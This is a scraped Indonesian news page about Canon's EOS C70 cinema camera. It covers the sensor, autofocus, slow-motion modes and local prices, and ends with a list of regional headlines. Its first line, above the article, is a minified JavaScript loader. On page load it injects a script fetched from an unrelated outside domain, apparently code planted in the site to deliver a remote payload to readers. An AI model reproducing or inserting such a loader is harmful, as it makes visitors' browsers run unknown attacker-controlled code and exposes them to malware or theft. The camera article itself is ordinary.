(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Teknologi

Cocok Buat Videografer, Canon EOS C70 dengan Mount RF Punya Bodi Slim


KANALKALIMANTAN.COM – Canon melalui pt. Datascrip sebagai distributor tunggal produk di Indonesia, menghadirkan kamera sinema Canon EOS C70.

Perangkat ini merupakan kamera sinema EOS RF Mount pertama Canon, yang mengintegrasikan teknologi sensor DGO (Dual Gain Output), Filter ND, Input Audio XLR Mini.

Juga dilengkapi dengan Canon Log, Timecode, mode perekaman SlowMotion, dan mampu merekam dengan frame rate tinggi hingga 4K/120P ke dalam bodi yang ringkas dan ringan.

Kamera ini cocok digunakan para videografer, content creator atau pun vlogger dalam menghasilkan konten berkualitas.

Canon EOS C70. [Datascrip]

Kamera ini juga dapat merekam dengan posisi vertikal guna memenuhi kebutuhan pengguna saat merekam video untuk pembuatan konten media sosial, dengan format gambar di smartphone.

Tersedia juga dudukan tripod saat perekaman vertikal, sehingga memudahkan kamu saat memasangkan kamera di tripod.

Menurut Monica Aryasetiawan – Director of Canon Business Unit pt. Datascrip, EOS C70 hadir dengan desain bodi yang ringkas dan ringan, disertai berbagai teknologi terbaru dari Canon.

“Inovasi ini kami lakukan demi memenuhi kebutuhan para videografer, rumah produksi, ataupun para vlogger dan content creator yang ingin memproduksi berbagai video berkualitas tinggi dengan mudah, baik untuk kebutuhan profesional ataupun untuk diunggah ke media sosial, seperti instagram dan youtube,” jelasnya.

EOS C70 memiliki sensor 4K Super 35mm CMOS DGO dengan 16+ stop dynamic range, sehingga dapat merekam video 4K berkualitas tinggi.

Kamera ini juga dibekali dengan prosesor gambar DIGIC DV7 berkecepatan tinggi, sehingga kamu dapat merekam video dalam format 4K/120P, XF-AVC dan MP4 dengan kecepatan frame yang tinggi ke kartu SD standar UHS-II.

EOS C70 juga dilengkapi dengan dua slot kartu SD, sehingga mendukung berbagai mode perekaman seperti perekaman simultan, perekaman relai, full HD, dan perekaman 4K/2K.

Untuk mode SlowMotion, kamera ini mampu merekam hingga 120fps dalam S35mm dan 180fps pada mode S16mm.

Teknologi pada kamera ini menggabungkan teknologi Dual Pixel CMOS AF dengan fitur Intelligent Tracking dan Recognition System, dikembangkan bersama dengan Face Detection AF untuk meningkatkan pelacakan fokus yang semakin akurat.

EOS C70 juga merupakan kamera sinema EOS pertama dilengkapi EOS iTR AF X, suatu algoritma AF baru yang meningkatkan akurasi pendeteksian dan pelacakan subjek, termasuk Head Detection.

Canon EOS C70. [Datascrip]

Canon EOS C70 ini juga mewarisi banyak fitur profesional yang ditemukan di lini EOS Cinema sebelumnya, termasuk dua Audio XLR mini, dial kontrol audio, Timecode IN/OUT, terminal HDMI, dan fungsi Direct Touch Control baru.

EOS C70 adalah kamera sinema EOS system pertama yang memiliki dudukan lensa RF, sehingga kompatibel dengan lensa RF dari sistem EOS R Canon.

Untuk harganya sendiri, Canon Cinema EOS C70 Body Only dengan harga Rp 98.000.000, sementara Mount Adapter EF-EOS R 0.71x dengan harga Rp 11.000.000(Suara)

Editor : Suara 

 

 

 


Al Ghifari

Recent Posts

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

28 menit ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

56 menit ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

15 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

17 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

19 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

20 jam ago

This website uses cookies.